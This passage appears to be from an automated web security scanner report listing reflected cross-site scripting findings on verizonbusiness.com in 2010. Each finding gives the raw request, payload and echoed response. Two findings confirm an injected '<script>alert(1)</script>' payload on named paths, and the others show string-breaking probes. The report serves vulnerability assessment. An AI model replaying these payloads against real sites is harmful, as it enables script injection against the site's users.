The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189e1'%3bb084a49165 was submitted in the REST URL parameter 3. This input was echoed as 189e1';b084a49165 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/index.xml189e1'%3bb084a49165?urlid=130487 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:41 GMT
Content-Type: text/html
Content-Length: 38181
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media/index.xml189e1';b084a49165'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.792. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88a95'%3be4ecccbdf2b was submitted in the REST URL parameter 1. This input was echoed as 88a95';e4ecccbdf2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources88a95'%3be4ecccbdf2b/media/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources88a95';e4ecccbdf2b/media/large-131367-customer+service+week.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.793. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 570a1"%3b07c3c90e857 was submitted in the REST URL parameter 1. This input was echoed as 570a1";07c3c90e857 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources570a1"%3b07c3c90e857/media/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources570a1";07c3c90e857/media/large-131367-customer+service+week.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.794. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e528f'%3b81d1e27ae8a was submitted in the REST URL parameter 2. This input was echoed as e528f';81d1e27ae8a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/mediae528f'%3b81d1e27ae8a/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40300
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/mediae528f';81d1e27ae8a/large-131367-customer+service+week.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.795. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b15"%3b7510c4873f8 was submitted in the REST URL parameter 2. This input was echoed as 58b15";7510c4873f8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media58b15"%3b7510c4873f8/large-131367-customer+service+week.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:22 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40298
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/media58b15";7510c4873f8/large-131367-customer+service+week.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MI
...[SNIP]...

1.796. http://www.verizonbusiness.com/resources/media/large-131367-customer+service+week.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131367-customer+service+week.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 123fe</script><script>alert(1)</script>054332bd3e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/large-131367-customer+service+week.xml123fe</script><script>alert(1)</script>054332bd3e3 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "98e7ebd93d7c938e5c85f439f81a8c7a"
Last-Modified: Wed, 17 Nov 2010 00:04:55 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:04:55 GMT
Content-Length: 16718
Connection: close
Set-Cookie: BERT=VRID%3da4ce657b-1476-4289-8f31-d1918a86f46c|VTID%3d5b5ee289-2f17-4b07-a400-a961f5387f4b|SX%3d1289953495|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:08:39 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:04:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/media/large-131367-customer+service+week.xml123fe</script><script>alert(1)</script>054332bd3e3</url>
...[SNIP]...

1.797. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca16'%3b7dc2f546387 was submitted in the REST URL parameter 1. This input was echoed as aca16';7dc2f546387 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesaca16'%3b7dc2f546387/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resourcesaca16';7dc2f546387/media/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.798. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76b1b"%3bcf900c3a2cb was submitted in the REST URL parameter 1. This input was echoed as 76b1b";cf900c3a2cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources76b1b"%3bcf900c3a2cb/media/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources76b1b";cf900c3a2cb/media/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.799. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 849ef'%3bb7a8498e367 was submitted in the REST URL parameter 2. This input was echoed as 849ef';b7a8498e367 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media849ef'%3bb7a8498e367/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/media849ef';b7a8498e367/large-131421-mitsui.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.800. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fde55"%3b3e5e9e12e8f was submitted in the REST URL parameter 2. This input was echoed as fde55";3e5e9e12e8f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/mediafde55"%3b3e5e9e12e8f/large-131421-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40268
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:05:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/mediafde55";3e5e9e12e8f/large-131421-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.801. http://www.verizonbusiness.com/resources/media/large-131421-mitsui.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131421-mitsui.xml

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e14d0</script><script>alert(1)</script>f09a4b3545 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/media/large-131421-mitsui.xmle14d0</script><script>alert(1)</script>f09a4b3545 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "84d6f9f091bfb97defbc17b4c241ec9d"
Last-Modified: Wed, 17 Nov 2010 00:05:36 GMT
Vary: User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 17252
Date: Wed, 17 Nov 2010 00:05:36 GMT
Connection: close
Set-Cookie: BERT=VRID%3da30b5fd1-b46b-49b1-a52b-6ce539af813e|VTID%3dffebfd47-c12f-4f72-ab82-f9be034fd5e9|SX%3d1289953536|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:09:20 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:05:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<url>/resources/media/large-131421-mitsui.xmle14d0</script><script>alert(1)</script>f09a4b3545</url>
...[SNIP]...

1.802. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e6127"%3b6b388d8beb6 was submitted in the REST URL parameter 1. This input was echoed as e6127";6b388d8beb6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese6127"%3b6b388d8beb6/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese6127";6b388d8beb6/media/large-131513-mitsui.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.803. http://www.verizonbusiness.com/resources/media/large-131513-mitsui.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/media/large-131513-mitsui.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfb4d'%3b45f688c8adb was submitted in the REST URL parameter 1. This input was echoed as cfb4d';45f688c8adb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescfb4d'%3b45f688c8adb/media/large-131513-mitsui.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:31 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:31 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:31 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
